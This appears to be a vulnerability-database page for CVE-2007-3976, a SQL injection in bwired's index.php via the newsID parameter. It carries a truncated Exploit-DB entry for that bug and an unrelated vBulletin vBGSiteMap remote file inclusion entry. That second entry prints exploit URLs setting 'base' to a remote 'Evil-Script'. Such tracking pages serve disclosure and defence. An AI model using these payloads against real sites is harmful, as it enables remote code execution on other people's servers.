CVE-2007-3976
published 2007-07-25CVE-2007-3976: SQL injection vulnerability in index.php in bwired allows remote attackers to execute arbitrary SQL commands via the newsID parameter.
PriorityP339high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
1.03%
59.3th percentile
SQL injection vulnerability in index.php in bwired allows remote attackers to execute arbitrary SQL commands via the newsID parameter.
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
bwired - 'index.php?newsID' SQL Injection
exploitdb·2007-07-22
CVE-2007-3978 bwired - 'index.php?newsID' SQL Injection
bwired - 'index.php?newsID' SQL Injection
---
###############################################################################################
# ___ ___ _
# / _ \ / _ \ | |
# __ _| | | | | | |_ __ ___ _ __ ___| |_
# / _` | | | | | | | '_ \/ __| | '_ \ / _ \ __|
# | (_| | |_| | |_| | | | \__ \_| | | | __/ |_
# \__, |\___/ \___/|_| |_|___(_)_| |_|\___|\__|
# __/ |
# |___/
###############################################################################################
#Program Title ################################################################################
#bwired - Remote SQL Injection
#
#Note #######################################################################################
#There is also XSS, PHPSESSID session fixation, and cookie manipulation which I will not go into..
#The adm
Exploit-DB
vBulletin vBGSiteMap 2.41 - 'root' Remote File Inclusion
exploitdb·2007-05-25
CVE-2007-2941 vBulletin vBGSiteMap 2.41 - 'root' Remote File Inclusion
vBulletin vBGSiteMap 2.41 - 'root' Remote File Inclusion
---
vBulletin Google Site Map Creator (base) Remote File Include Vulnerability
Found by : Host4vb.com & Cold z3ro
Contact : [email protected] , [email protected]
Homepage : Host4vb.com , Hack-Teach.Org
Script : http://forum.time2dine.co.nz/seo-vbulletin/vbulletin-google-site-map-3976.html
File :
/vbgsitemap-vbseo.php <= Line 5
require $base."includes/functions_vbseo.php";
File :
/vbgsitemap-config.php <= Line 139
require $base."includes/config.php";
Exploit :
vBulletin_Forum_Bath/vbgsitemap/vbgsitemap-config.php?base=Evil-Script?
vBulletin_Forum_Bath/vbgsitemap/vbgsitemap-vbseo.php?base=Evil-Script?
Greets To : Xp10.com , Hack-Teach Members , All Arabs Hosting , Sniper-sa.com , sm4host.com
Thanx: Mohandko , Alkomandoz Hacker
No writeups or analysis indexed.
http://osvdb.org/39135http://www.vupen.com/english/advisories/2007/2612https://exchange.xforce.ibmcloud.com/vulnerabilities/35540https://www.exploit-db.com/exploits/4213http://osvdb.org/39135http://www.vupen.com/english/advisories/2007/2612https://exchange.xforce.ibmcloud.com/vulnerabilities/35540https://www.exploit-db.com/exploits/4213
2007-07-25
Published